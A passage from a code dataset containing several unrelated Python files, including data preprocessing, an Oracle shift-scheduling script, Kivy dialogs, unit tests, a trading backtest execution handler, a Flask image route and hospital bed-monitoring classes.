pd.read_pickle(testPath)\n logging.info('[DataProcessor] test shape: ' + str(test_set.shape))\n if 'r' in test_set.columns:\n r_test = test_set['r'].values\n\n return r_test\n\n @staticmethod\n def ExtractValidationLabels(testPath):\n \"\"\"Reads the .pickle file and converts it into a format suitable for testing on pulp\n You need to create a folder called test though\n\n Parameters\n ----------\n testPath : str\n The file location of the .pickle\n\n \"\"\"\n\n test_set = pd.read_pickle(testPath)\n logging.info('[DataProcessor] test shape: ' + str(test_set.shape))\n\n x_test = test_set['x'].values\n x_test = np.vstack(x_test[:]).astype(np.float32)\n h, w, c = DataManipulator.GetSizeDataFromDataFrame(test_set)\n x_test = np.reshape(x_test, (-1, h, w, c))\n\n x_test = np.swapaxes(x_test, 1, 3)\n x_test = np.swapaxes(x_test, 2, 3)\n y_test = test_set['y'].values\n y_test = np.vstack(y_test[:]).astype(np.float32)\n\n f = open(\"test/labels.txt\", \"w\")\n\n for i in range(0, len(x_test)):\n data = x_test[i]\n data = np.swapaxes(data, 0, 2)\n data = np.swapaxes(data, 0, 1)\n img = np.reshape(data, (h, w))\n #img = np.zeros((244, 324), np.uint8)\n #img[92:152, 108:216] = data\n cv2.imwrite(\"test/{}.pgm\".format(i), img)\n label = y_test[i]\n #f.write(\"{},{},{},{}\\n\".format(label[0], label[1],label[2],label[3]))\n f.close()\n\n\n\n @staticmethod\n def ProcessInferenceData(images, image_height, image_width, isGray=False):\n \"\"\"Converts a list of images into a format suitable for inference\n\n Parameters\n ----------\n images : list\n list of images\n image_height : int\n Please...\n image_width : int\n Please...\n isGray : bool, optional\n True if the dataset 
is of 1-channel (gray) images, False if RGB\n\n Returns\n -------\n list\n list of video frames and list of labels (poses, which are garbage)\n \"\"\"\n\n x_test = np.stack(images, axis=0).astype(np.float32)\n if isGray == True:\n x_test = np.reshape(x_test, (-1, image_height, image_width, 1))\n else:\n x_test = np.reshape(x_test, (-1, image_height, image_width, 3))\n x_test = np.swapaxes(x_test, 1, 3)\n x_test = np.swapaxes(x_test, 2, 3)\n y_test = [0, 0, 0, 0] * len(x_test)\n y_test = np.vstack(y_test[:]).astype(np.float32)\n y_test = np.reshape(y_test, (-1, 4))\n\n\n return [x_test, y_test]\n\n\n\n","sub_path":"PyTorch/DataProcessor.py","file_name":"DataProcessor.py","file_ext":"py","file_size_in_byte":9040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"513828652","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport cx_Oracle\nimport random\n\ncon = cx_Oracle.connect('tp3cinema/password@localhost:1521')\n\ncur = con.cursor()\n\ncur.execute('select funcionario_ctps from funcionario')\n\nfuncionarios_ids = [data[0] for data in cur.fetchall()]\n\ncur.execute('select nome, funcao_id from funcao')\n\nfuncoes = {data[0]: data[1] for data in cur.fetchall()}\n\ncur.execute('select distinct horario from EXIBICAO')\n\nhorarios = [data[0] for data in cur.fetchall()]\n\nrandom.shuffle(horarios)\n\nfor hor in horarios:\n # assignment requirement: at least 4 employees working per time slot\n qtd_trabalhando = random.randint(4, 15)\n random.shuffle(funcionarios_ids)\n cp_funcionarios = funcionarios_ids[:qtd_trabalhando + 1]\n\n # one manager\n cur.execute(\"INSERT INTO EXERCE( FUNCIONARIO, FUNCAO, HORARIO ) VALUES (:funcionario, :funcao, :horario)\",\n {'funcionario': cp_funcionarios.pop(), 'funcao': funcoes['Gerente'], 'horario': hor})\n # one cashier\n cur.execute(\"INSERT INTO EXERCE( FUNCIONARIO, FUNCAO, HORARIO ) VALUES (:funcionario, :funcao, :horario)\",\n {'funcionario': cp_funcionarios.pop(), 'funcao': funcoes['Caixa'], 'horario': hor})\n # one projectionist\n cur.execute(\"INSERT INTO EXERCE( FUNCIONARIO, FUNCAO, HORARIO ) VALUES (:funcionario, :funcao, :horario)\",\n {'funcionario': cp_funcionarios.pop(), 'funcao': funcoes['Projetista'], 'horario': hor})\n\n # one ticket seller\n cur.execute(\"INSERT INTO EXERCE( FUNCIONARIO, FUNCAO, HORARIO ) VALUES (:funcionario, :funcao, :horario)\",\n {'funcionario': cp_funcionarios.pop(), 'funcao': funcoes['Bilheteiro'], 'horario': hor})\n\n for funcionario in cp_funcionarios:\n funcao_ = random.choice(funcoes.values())\n # there cannot be 2 managers, cashiers or projectionists in the same time slot\n while funcao_ == 27 or funcao_ == 29 or funcao_ == 34:\n funcao_ = random.choice(funcoes.values())\n\n cur.execute(\"INSERT INTO EXERCE( FUNCIONARIO, FUNCAO, HORARIO ) VALUES (:funcionario, :funcao, :horario)\",\n {'funcionario': funcionario, 'funcao': funcao_, 'horario': hor})\n\n con.commit()\n\n\ncur.close()\ncon.close()\n","sub_path":"tp3tomcat/tp3sqldef/python scripts/exerce.py","file_name":"exerce.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"549708613","text":"import os\n\nfrom kivy.lang import Builder\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.label import Label\nfrom kivy.properties import StringProperty\nfrom functools import partial\nfrom src.calender import CustomDatePicker\nfrom src.db.manager import DatabaseManager\nfrom src.common_widget import CustomCheckBox\nfrom utils.data_tool 
import modify_date_form\nfrom utils import globals\nfrom settings import KVS_DIR\n\nBuilder.load_file(os.path.join(KVS_DIR, 'dialog_screen.kv'))\n\n\nclass OpenDialog(Popup):\n error = StringProperty()\n\n def __init__(self, time_stamp_ret, client, **kwargs):\n self.register_event_type('on_confirm')\n super(OpenDialog, self).__init__(**kwargs)\n self.date_picker = CustomDatePicker()\n self.db_manager = DatabaseManager()\n self.selected_btn = None\n self.time_stamp_data_info = []\n self.time_stamp_ret = time_stamp_ret\n self.selected_client = client\n\n def on_error(self, inst, text):\n if text:\n self.lb_error.size_hint_y = 1\n self.size = (400, 250)\n else:\n self.lb_error.size_hint_y = None\n self.lb_error.height = 0\n self.size = (400, 250)\n\n def _enter(self):\n if not self.first_text or not self.second_text:\n self.error = \"Error: enter 2 dates\"\n else:\n self.dispatch('on_confirm', self.first_text, self.second_text)\n\n def _cancel(self):\n self.dismiss()\n\n def on_confirm(self, *args):\n pass\n\n def show_calendar(self, select_btn):\n self.selected_btn = select_btn\n self.date_picker.show_popup(1, 1)\n self.date_picker.bind(on_confirm=self.select_date)\n\n def select_date(self, *args):\n args[0].focus = False\n selected_date = args[1]\n if self.time_stamp_ret:\n self.time_stamp_data_info = \\\n self.db_manager.read_only_time_stamp(date=modify_date_form(f_date=selected_date),\n client=self.selected_client)\n if len(self.time_stamp_data_info) != 0:\n time_stamp_select = TimeStampDialog(t_s_info=self.time_stamp_data_info, title=\"Select time stamp\")\n time_stamp_select.bind(on_confirm=partial(self.get_time_stamp))\n time_stamp_select.open()\n else:\n if self.selected_btn == \"1\":\n self.ids.first_selected_date.text = selected_date\n else:\n self.ids.second_selected_date.text = selected_date\n\n def get_time_stamp(self, *args):\n\n args[0].dismiss()\n if self.selected_btn == \"1\":\n self.ids.first_selected_date.text = self.time_stamp_data_info[int(args[1])]\n else:\n self.ids.second_selected_date.text = self.time_stamp_data_info[int(args[1])]\n globals.checked_item = \"\"\n\n\nclass OpenFileDialog(Popup):\n error = StringProperty()\n\n def __init__(self, **kwargs):\n self.register_event_type('on_confirm')\n super(OpenFileDialog, self).__init__(**kwargs)\n self.selected_btn = None\n\n def on_error(self, inst, text):\n if text:\n self.lb_error.height = 30\n self.height += 30\n else:\n self.lb_error.size_hint_y = None\n self.lb_error.height = 0\n self.size -= 30\n\n def _enter(self):\n if not self.first_text or not self.second_text:\n self.error = \"Error: enter 2 files\"\n else:\n self.dispatch('on_confirm', self.first_text, self.second_text)\n\n def _cancel(self):\n self.dismiss()\n\n def on_confirm(self, *args):\n pass\n\n def show_file_browser(self, select_btn):\n self.selected_btn = select_btn\n file_browser = LoadDialog()\n file_browser.bind(on_confirm=partial(self.get_selected_file))\n file_browser.open()\n\n def get_selected_file(self, *args):\n args[0].dismiss()\n file_path = args[1]\n file_name = args[2][0]\n file_full_path = os.path.join(file_path, file_name)\n if self.selected_btn == \"1\":\n self.ids.first_selected_file.text = file_full_path\n else:\n self.ids.second_selected_file.text = file_full_path\n\n\nclass TimeStampDialog(Popup):\n error = StringProperty()\n\n def __init__(self, t_s_info, title, **kwargs):\n super(TimeStampDialog, self).__init__(**kwargs)\n self.register_event_type('on_confirm')\n self.title = title\n self.set_widget(t_s_info=t_s_info)\n\n def 
set_widget(self, t_s_info):\n self.ids.time_stamp.clear_widgets(self.ids.time_stamp.children[:])\n self.ids.time_stamp.cols = 2\n for i, t_s_i in enumerate(t_s_info):\n self.ids.time_stamp.add_widget(CustomCheckBox(group='check', text=str(i), size_hint_x=0.2,\n color=[1.0, 1.0, 1.0, 1.0], size_hint_y=None, height=30))\n label_box = Label(size_hint_x=0.8, text=t_s_i, size_hint_y=None, height=30)\n self.ids.time_stamp.add_widget(label_box)\n self.ids.time_stamp.height = 30 * len(t_s_info)\n self.height = self.ids.time_stamp.height + 100\n\n def on_error(self, inst, text):\n if text:\n self.lb_error.height = 30\n self.height += 30\n else:\n self.lb_error.size_hint_y = None\n self.lb_error.height = 0\n self.size -= 30\n\n def _enter(self):\n\n if globals.checked_item == \"\":\n self.error = \"Error: select one of above checks\"\n else:\n self.dispatch('on_confirm', globals.checked_item)\n\n def on_confirm(self, *args):\n pass\n\n def _cancel(self):\n self.dismiss()\n\n\nclass LoadDialog(Popup):\n error = StringProperty()\n\n def __init__(self, **kwargs):\n super(LoadDialog, self).__init__(**kwargs)\n self.register_event_type('on_confirm')\n\n def on_error(self, inst, text):\n if text:\n self.lb_error.height = 30\n self.height += 30\n else:\n self.lb_error.size_hint_y = None\n self.lb_error.height = 0\n self.size -= 30\n\n def dismiss_popup(self):\n self.dismiss()\n\n def load(self):\n\n if not self.path or not self.filename:\n self.error = \"Error: select file\"\n else:\n file_ext = self.filename[0][self.filename[0].rfind(\".\") + 1:]\n if \"ack\" not in file_ext.lower():\n self.error = \"Select the correct ACK file\"\n else:\n self.dispatch('on_confirm', self.path, self.filename)\n\n def on_confirm(self, *args):\n pass\n\n\nif __name__ == '__main__':\n\n OpenDialog(time_stamp_ret=True, client=\"\")\n","sub_path":"src/dialog.py","file_name":"dialog.py","file_ext":"py","file_size_in_byte":6725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"210376754","text":"\n# Author: Saul Rodrigo Toral Luna Student ID: A01745007\n# Description: The program converts Cartesian coordinates to polar coordinates\n\n#1.- Input values for the coordinates (x,y)\nimport math\n\nx = input(\"Enter a value for x: \")\ny = input(\"Enter a value for y: \")\n\n#2.- Compute the value of the magnitude of \"r\"\n# Using the Pythagorean theorem c = (x^2 + y^2)^1/2\n\nr = ((int(x)**2) + int(y)**2)**0.5\n\n#3.- Compute the value of the angle in degrees.\n# Using arctan(y/x)\n\ng = math.atan2(float(y),float(x))\n\n#4.- When using arctan, python returns values from -pi to pi\n# Therefore, to convert to degrees, multiply by 180/pi\n\ngrados = (g) * (180/math.pi)\n\n#5.- Print the magnitude of r and the degrees\n\nprint(\"The magnitude of r is: \", r)\nprint(\"The degrees are: \", grados)\n","sub_path":"coordenadas.py","file_name":"coordenadas.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"170382204","text":"import os\n\nimport panda3d.core as p3d\nfrom direct.showbase.ShowBase import ShowBase\nimport pytest #pylint:disable=wrong-import-order\n\nimport gltf\n\n#pylint:disable=redefined-outer-name\n\n\n@pytest.fixture(scope='session')\ndef showbase():\n p3d.load_prc_file_data('', 'window-type none')\n base = ShowBase()\n gltf.patch_loader(base.loader)\n return base\n\n@pytest.fixture\ndef modelpath():\n return p3d.Filename.from_os_specific(\n os.path.join(\n 
os.path.dirname(__file__),\n 'test.gltf'\n )\n )\n\ndef test_load_single(showbase, modelpath):\n showbase.loader.load_model(modelpath)\n\n\ndef test_load_multiple(showbase, modelpath):\n showbase.loader.load_model([modelpath, modelpath])\n showbase.loader.load_model({modelpath, modelpath})\n # doesn't work on Panda3D 1.10.4+\n # showbase.loader.load_model((modelpath, modelpath))\n","sub_path":"tests/test_load.py","file_name":"test_load.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"158046774","text":"import unittest\nimport actExamples.likelihood as lhood\nimport numpy as np\nfrom ConfigParser import SafeConfigParser \n\ndef listFromConfig(Config,section,name):\n return [float(x) for x in Config.get(section,name).split(',')]\n\nclass LikeTests(unittest.TestCase):\n \n def setUp(self):\n iniFile = \"tests/config.ini\"\n self.Config = SafeConfigParser()\n self.Config.optionxform=str\n self.Config.read(iniFile)\n\n def test_model(self):\n model_true = np.loadtxt(self.Config.get(\"files\",\"testModelVec\"))\n vec = np.asarray(listFromConfig(self.Config,\"makeTest\",\"testVec\"))\n paramA = self.Config.getfloat(\"makeTest\",\"paramA\")\n paramB = self.Config.getfloat(\"makeTest\",\"paramB\")\n ans = lhood.model(vec,paramA,paramB)\n self.assertEqual(model_true.tolist(), ans.tolist())\n\n def test_lnLike(self):\n model = np.loadtxt(self.Config.get(\"files\",\"testModelVec\"))\n data = np.loadtxt(self.Config.get(\"files\",\"testDataVec\"))\n invc = np.loadtxt(self.Config.get(\"files\",\"testInvCov\"))\n ans = lhood.logLike(model,data,invc)\n expected = self.Config.getfloat(\"makeTest\",\"expected\")\n self.assertAlmostEqual(ans, expected,places=self.Config.getint(\"makeTest\",\"precisionPlaces\"))\n \n\nif __name__ == '__main__':\n unittest.main() \n","sub_path":"tests/testLike.py","file_name":"testLike.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"120798471","text":"import signup1\nimport getUser\nimport delUser\n\ndef doUser(email):\n baseUrl = 'http://localhost:50001'\n signup1.makeUser(email, baseUrl)\n userId = getUser.findUserIdByEmail(email, baseUrl)\n delUser.deleteUser(userId, baseUrl)\n\n\nfor i in range(1,5):\n email = f'jg+{i}@ajoursystem.dk'\n #email = f'jgaardsted+{i}@gmail.com'\n doUser(email)","sub_path":"signup/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"451847171","text":"#information about the platform this script is running on\n\ndef main():\n import platform\n profile = [\n platform.architecture(),\n platform.dist(),\n platform.libc_ver(),\n platform.mac_ver(),\n platform.machine(),\n platform.node(),\n platform.platform(),\n platform.processor(),\n platform.python_build(),\n platform.python_compiler(),\n platform.python_version(),\n platform.system(),\n platform.uname(),\n platform.version(),\n ]\n for i in profile:\n print(i)\nif __name__ == '__main__':\n main()","sub_path":"platform_info/platform_info.py","file_name":"platform_info.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"228828373","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 18 19:06:02 2019\r\nHomework #2 Astro 119\r\n@author: 
eric_\r\n\"\"\"\r\n#============================================================\r\n# problem 1 earthquake rates, earthquake and well locations\r\n#============================================================\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nWell_file = 'injWell_OK.txt' #data files\r\nSeism_file = 'seism_OK.txt'\r\n\r\n#=============================================================\r\n# load data\r\n#=============================================================\r\nWell_data = np.loadtxt(Well_file).T\r\nSeism_data = np.loadtxt(Seism_file).T\r\n\r\n#change date-time columns to decimal years\r\nDecYear = Seism_data[1] + ((Seism_data[2]-1)/12) + ((Seism_data[3]-1)/365.25)\\\r\n+ (Seism_data[4]/(365.25*24)) + (Seism_data[5]/(365.25*24*60)) +\\\r\n (Seism_data[6]/(365.25*24*3600))\r\n\r\n\r\n\r\n#================================================================\r\n# comp rate function\r\n#================================================================\r\nk_win = 200\r\ndef comp_rate( at, k_win):\r\n # smoothed rate from overlapping sample windows normalized by delta_t\r\n aS = np.arange( 0, at.shape[0]-k_win, 1)\r\n aBin, aRate = np.zeros(aS.shape[0]), np.zeros(aS.shape[0])\r\n iS = 0\r\n for s in aS:\r\n i1, i2 = s, s+k_win\r\n aBin[iS] = 0.5*( at[i1]+at[i2])\r\n aRate[iS] = k_win/( at[i2]-at[i1])\r\n iS += 1\r\n return aBin, aRate\r\n\r\n#================================================================\r\n# earthquake rate plot \r\n#================================================================\\\r\n#Using histograms\r\naBin, aRate = comp_rate(DecYear, k_win)\r\nbinsize = 1/12\r\naHistBins = np.arange(DecYear[0], DecYear[-1], (binsize))\r\naN_bin, aHistBins = np.histogram(DecYear, bins = aHistBins)\r\naN_bin = aN_bin/binsize\r\nplt.figure(3)\r\nplt.title(\"Earthquake rate\")\r\n\r\nearthquake_rate = plt.subplot(211)\r\nearthquake_rate.set_title(\"Using Histogram\")\r\nearthquake_rate.set_xlim(1973, 2020)\r\nearthquake_rate.set_xlabel(\"Time (yrs)\")\r\nearthquake_rate.set_ylabel(\"Number of Earthquakes\")\r\nearthquake_rate = plt.plot( aHistBins[0:-1]+.5*binsize, aN_bin, 'ko')\r\n\r\n\r\n#using comp rate funciton\r\naxis1 = plt.subplot(212)\r\naxis1.set_title(\"Using Comp Rate\")\r\naxis1.plot(aBin, aRate, 'ko', lw = .1, ms = 1)\r\naxis1.set_xlabel(\"Time (yrs)\"), axis1.set_ylabel(\"Number of Earthquakes\")\r\naxis1.set_xlim(1973, 2020)\r\nplt.show()\r\n\r\n#=================================================================\r\n# plot active wells\r\n#=================================================================\r\nyear_vector = np.genfromtxt(Well_file, skip_header = 1, usecols= (1), dtype = \\\r\n float)\r\n#print(year_vector)\r\nsort_id = year_vector.argsort()\r\nyear_vector = year_vector[sort_id]\r\n\r\n#=================================================================\r\n# for loop active wells\r\n#=================================================================\r\nsel_eq = 0\r\nsel_eq2 = 0\r\nfor i in np.arange(2005, 2013, 1): \r\n sel_eq = 0\r\n sel_eq2 = 0\r\n for it in range(np.shape(year_vector)[0]):\r\n if year_vector[it] > i and year_vector[it] < i + 0.5:\r\n sel_eq = sel_eq + 1\r\n var1 = sel_eq\r\n if year_vector[it] > i + 0.5 and year_vector[it] < i + 1:\r\n sel_eq2 = sel_eq2 + 1\r\n var2 = sel_eq2\r\n print(\"Number of active wells between Jan\", i, \"- June\", i, \": \", var1)\r\n \r\n print(\"Number of active wells between July\", i, \"- December\", i, \": \", \\\r\n var2)\r\n plt.figure(4000)\r\n plt.title(i)\r\n subplot_1 = 
plt.subplot(211)\r\n First_histo = plt.hist(var1, 1)\r\n subplot_2 = plt.subplot(212)\r\n Second_histo = plt.hist(var2, 1)\r\n #plt.show\r\n plt.pause(0.5)\r\n plt.clf\r\n\r\n\r\n#=================================================================\r\n# earthquakes from 2005 to 2018\r\n#=================================================================\r\nnum_earthquakes = 0\r\nnum_earthquakes2 = 0\r\nfor element in np.arange(2005, 2018, 0.5):\r\n num_earthquakes = 0\r\n num_earthquakes2 = 0\r\n var3 = 0\r\n var4 = 0\r\n for it in range(np.shape(DecYear)[0]):\r\n if DecYear[it] > element and DecYear[it] < element + 0.5:\r\n num_earthquakes += 1\r\n var3 = num_earthquakes\r\n if DecYear[it] > element + 0.5 and DecYear[it] < element + 1:\r\n num_earthquakes2 += 1\r\n var4 = num_earthquakes2\r\n plt.figure(5000)\r\n plt.title(element)\r\n e_subplot_1 = plt.subplot(211)\r\n e_First_histo = plt.hist(var3, 1)\r\n e_subplot_2 = plt.subplot(212)\r\n e_Second_histo = plt.hist(var4, 1)\r\n plt.pause(0.5)\r\n plt.clf\r\n \r\n\r\n\r\n#earthquakes seem to spike in 2013\r\n \r\n \r\n\"\"\"for it in np.unique(year_vector):\r\n if it > 2004 and it < it + 0.5:\r\n sel_eq = it == year_vector\r\n print(\"it= \", it, \"sel_eq.sum() = \", sel_eq.sum())\r\n elif it > 2004 and it > it + 0.5:\r\n sel_eq2 = it == year_vector\r\n print(\"it2 = \", it, \"sel_eq2.sum() = \", sel_eq2.sum())\"\"\"\r\n\r\n\r\n\"\"\"for it in np.unique(year_vector):\r\n if it > 2004:\r\n sel_eq3 = it == year_vector\r\n print(\"current year\", it, \"#no of active wells: \", sel_eq3.sum())\r\n plt.figure(2)\r\n subplot_1 = plt.subplot(211)\r\n subplot_1.set_xlim(0, 150)\r\n plt.hist(sel_eq3.sum(), 1)\r\n #plt.show\r\n plt.pause(0.5)\r\n plt.clf\"\"\"\r\n \r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"hw2/submission/leeric/leeric_33229_1274761_HW2_earthquakes-1.py","file_name":"leeric_33229_1274761_HW2_earthquakes-1.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"579451880","text":"import pandas as pd\n\nfrom abc import ABC, abstractmethod\n\nfrom event import FillEvent, Order\nfrom event_queue import EventQueue\nfrom data_handler import DataHandler\n\nclass ExecutionHandler(ABC):\n @abstractmethod\n def send_order(self, order):\n pass\n\n\nclass BacktestExecutionHandler(ExecutionHandler):\n def __init__(self, queue, data_handler):\n self.queue = queue\n self.data_handler = data_handler\n\n def calculate_fill_cost(self, order, reach_time):\n if order.order_type == \"MKT\":\n try:\n quotes = self.data_handler.lookahead[order.symbol][\"QUOTES\"].loc[reach_time:].iloc[0]\n except:\n return order.price\n if order.direction == \"BUY\":\n fill_price = quotes[\"askPrice\"]\n else:\n fill_price = quotes[\"bidPrice\"]\n return order.quantity * fill_price\n else:\n # will need self.data_handler.lookahead[order.symbol][\"QUOTES\"].loc[reach_time:] too\n return order.price\n\n def calculate_fill_quantity(self, order, reach_time):\n # for non-market orders\n return int(order.quantity)\n\n def calculate_latency(self, order, send_time):\n # will eventually use self.data_handler.lookahead[order.symbol][\"QUOTES\"].loc[reach_time:]\n # probably can split into send latency, receive latency\n return pd.Timedelta(\"3s\")\n\n def send_order(self, order, send_time):\n reach_time = send_time + self.calculate_latency(order, send_time)\n sign = [1, -1][order.direction == \"SELL\"]\n quantity = sign * self.calculate_fill_quantity(order, reach_time)\n cost = sign * 
self.calculate_fill_cost(order, reach_time)\n # will need to figure out how the fills and orders work for each exchange\n fe = FillEvent(reach_time, order.symbol, order.exchange, order.order_type, quantity, cost)\n self.queue.put(fe)\n\n\nif __name__ == \"__main__\":\n def read_trades_csv(trades_csv_path):\n df = pd.read_csv(\n trades_csv_path,\n usecols=[\"received\", \"size\", \"price\"],\n parse_dates=[\"received\"],\n index_col=\"received\",\n nrows=30000\n )\n return df\n\n def read_quotes_csv(quotes_csv_path):\n df = pd.read_csv(\n quotes_csv_path,\n usecols=[\"bidSize\", \"bidPrice\", \"askPrice\", \"askSize\", \"recorded\"],\n parse_dates=[\"recorded\"],\n index_col=\"recorded\",\n )\n df.index.name = \"received\"\n return df\n\n trades_csv_path = \"play_data/XBTUSD_trades_191214_0434.csv\"\n quotes_csv_path = \"play_data/XBTUSD_quotes_191214_0434.csv\"\n\n tdf = read_trades_csv(trades_csv_path)\n qdf = read_quotes_csv(quotes_csv_path)\n\n sym = \"XBTUSD\"\n all_data = {sym: {}}\n all_data[sym][\"TRADES\"] = tdf\n all_data[sym][\"QUOTES\"] = qdf\n\n init_cap = 100000\n start_time = tdf.index[1500] # start time\n\n dh = DataHandler(start_time, all_data)\n eq = EventQueue(start_time)\n eh = BacktestExecutionHandler(eq, dh)\n order = Order(sym, \"BitMEX\", \"MKT\", \"BUY\", 10, 0)\n\n eh.send_order(order, start_time)\n print(eq.get())\n","sub_path":"infrastructure/execution_handler.py","file_name":"execution_handler.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"135771083","text":"# Imports\nfrom flask import Flask, make_response\nfrom PIL import Image\nfrom io import BytesIO\n\napp = Flask(__name__)\n\n@app.route('/')\n@app.route('/<int:num_page>')\ndef index(num_page=0):\n return \"Hello!!!\"+str(num_page)\n\n@app.route('/picture')\ndef picture():\n my_picture=BytesIO()\n Image.new(\"RGB\", (400,300), \"#13f\").save(my_picture, \"BMP\")\n response=make_response(my_picture.getvalue())\n response.mimetype=\"image/bmp\"\n return response\n\nif __name__=='__main__':\n app.run(debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"536915734","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"MOD005622 TRI2 B01CAM\"\"\"\n__author__ = \"Tim Clarke\"\n__copyright__ = \"Copyright 2020, Tim Clarke/Zach Beed\"\n__license__ = \"Private\"\n__version__ = \"0.0.6\"\n\n# app-specific constants\nimport constants\nfrom module import Modules\n# PyQt libraries\nfrom PyQt5 import QtGui, uic, QtCore, QtWidgets\n\n\"\"\"\nbed.py\n\n created by: Tim Clarke\n date: 11mar2020\n purpose: bed class\n\"\"\"\n\nclass Beds():\n \"\"\"singleton collection and management of Bed data and objects\"\"\"\n _instance = None\n\n \"\"\"private dictionary of all beds and database object\"\"\"\n _beds = []\n _db = None\n\n def __new__(self, *args, **kwargs):\n \"\"\"singleton override\"\"\"\n if not self._instance:\n self._instance = object.__new__(self)\n return self._instance\n\n def __init__(self, db):\n self._db = db\n\n def getBeds(self):\n \"\"\"return all records for display\"\"\"\n colnames, data = self._db.query(\"\"\"\n SELECT bedid, bednumber\n FROM bed\n ORDER BY bednumber\"\"\", None)\n if colnames is not None:\n # store all the records individually as objects\n for record in data:\n moduleList = Modules(self._db).getModulesForBed(record[0])\n bed = Bed(self._db, 
record[0], record[1], constants.BAY_NUMBER, constants.STATION_NUMBER, moduleList)\n self._beds.append(bed)\n return self._beds\n\n def getBed(self, bedid):\n \"\"\"get specific bed by id\"\"\"\n for bed in self._beds:\n if bed.bedid == bedid:\n return bed\n\nclass Bed():\n \"\"\"Bed object\"\"\"\n \n \"\"\"private attributes\"\"\"\n _db = None\n _bedid = None\n _bednumber = None\n _bayid = None\n _stationid = None\n _modules = []\n _alarm = False\n _alarmMonitorTypes = {} # dictionary of alarm states, key is monitortype, value is a dictionary of the value, direction and unit\n _critalarm = False\n _critAlarmMonitorTypes = {} # dictionary of critical alarm states, key is monitortype, value is a dictionary of the value, direction and unit\n _patientid = None\n\n def __init__(self, db, bedid, bednumber, bayid, stationid, modules):\n self._db = db\n self._bedid = bedid\n self._bednumber = bednumber\n self._bayid = bayid\n self._stationid = stationid\n self._modules = modules\n self._patientid = 2\n\n def addModule(self, module):\n \"\"\"add a module to the bed\"\"\"\n # prevent more than the maximum design number of modules being added \n if len(self._modules) > constants.MAX_MODULES_PER_BED - 1:\n raise ValueError('cannot have more than {0} modules per bed'.format(constants.MAX_MODULES_PER_BED))\n self._modules.append(module)\n\n def displayTitles(self):\n \"\"\"return a list of column names for display\"\"\"\n return ['id', 'Bed Number', \"Monitors\"]\n\n def display(self):\n \"\"\"return a displayable list of columns\"\"\"\n modules = []\n for module in self._modules:\n modules.append(module.shortDisplay())\n return self._bedid, self._bednumber, '\\n'.join(modules)\n\n def getBedid(self):\n \"\"\"return bedid\"\"\"\n return self._bedid\n\n bedid = property(getBedid)\n\n def getBedNumber(self):\n \"\"\"return bed number\"\"\"\n return self._bednumber\n\n bednumber = property(getBedNumber)\n\n def setMonitorTypeValue(self, monitortypeid, newvalue):\n \"\"\"set the monitortypeid for this bed to newvalue\"\"\"\n for module in self._modules:\n if monitortypeid in module.monitortypeids:\n module.setMonitorTypeValue(monitortypeid, newvalue, self)\n\n def alarmOn(self, monitortypeid, name, value, direction, unit):\n # only possible if there is a patient in the bed\n if self._patientid:\n \"\"\"receiving function for an alarm\"\"\"\n self._alarm = True\n # save the alarm status\n self._alarmMonitorTypes[monitortypeid] = [value, direction, unit]\n # record the event for auditing\n self._recordBedEvent(constants.BEDEVT_ALARM_ON, monitortypeid)\n\n def resetAlarm(self):\n \"\"\"cancel a standard alarm\"\"\"\n self._alarm = False\n\n def isAlarmOn(self):\n \"\"\"return state of alarm\"\"\"\n return self._alarm\n\n isAlarmOn = property(isAlarmOn)\n\n def alarmOff(self, monitortypeid):\n \"\"\"receiving function for an alarm\"\"\"\n self._alarm = False\n # save the alarm status if this alarm was set\n try:\n del self._alarmMonitorTypes[monitortypeid]\n # record the event for auditing\n self._recordBedEvent(constants.BEDEVT_ALARM_OFF, monitortypeid)\n except KeyError:\n # ignore, this alarm was not set\n pass\n\n def getAlarms(self):\n \"\"\"return displayable list of current alarms\"\"\"\n display = ''\n for key, value in self._alarmMonitorTypes.items():\n # assemble the name, the value, the direction and the unit\n display += str(value[0]) + value[1] + ' ' + value[2] + ' '\n return display\n\n alarms = property(getAlarms)\n\n def critAlarmOn(self, monitortypeid, name, value, direction, unit):\n # only possible if there is a 
